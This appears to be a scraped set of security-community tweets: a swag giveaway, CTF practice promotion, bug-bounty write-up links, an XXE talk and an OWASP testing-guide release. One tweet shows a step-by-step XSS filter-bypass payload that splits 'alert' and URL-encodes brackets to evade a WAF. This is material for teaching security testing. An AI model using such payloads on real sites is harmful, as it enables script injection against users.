Santa is here and he is giving away one special holiday swag pack! All you have to do for a chance to win this awesome SecurityTrails holiday pack is RT this tweet and FOLLOW us on Twitter. Winner will be announced on Monday the 20th.
Good luck! 🤓 🤞
Looking for ways to sharpen your #hacking skills before the next CTF? If you haven't checked out the picoGYM, it's basically a gym... but instead of weights 🏋️ you've got countless CTF challenges to solve in a non-competitive environment. 💻Check it out: https://t.co/1wHEwhzyra
Our 1st-choice #XSS vector reflects:
<Svg/Onload=1
We try to add code but "alert" string gets caught (403) so we split it:
top["al"+"ert"]
No 403 but 400 status code this time so we encode brackets:
<Svg/Onload=top%5B"al"%2B"ert%5D(1)//
#TheArtOfBypass
Stay tuned. 😎
I and @rootxharsh found and exploited a 0Day RCE in Apple's Travel Portal and were rewarded with $50K. Here's the write-up for that:
https://t.co/zMpw2QOEvP
Did you know: The term 'bug' (as it refers to computers) was first coined in 1947 when a group of computer scientists found an actual moth causing malfunctions in a computer.
A few years back my friend and college @fabio_viggiani presented a talk on my absolute favorite bug class XXE’s. If you like servers side bugs & want to learn more about xml injections, then check this out!
https://t.co/V5NHdRdc2B
#bugbountytips#CyberSecurity#pentesting
#OWASP Web Security Testing Guide v4.2 is out!
Congratulations to the team
working on this project! The "Bible" , the guide book for pentesers, QA, #AppSec engineers, bug bounty hunters and of course developers is updated.
Here is the PDF:
https://t.co/BSTLgoKpBV
#WSTG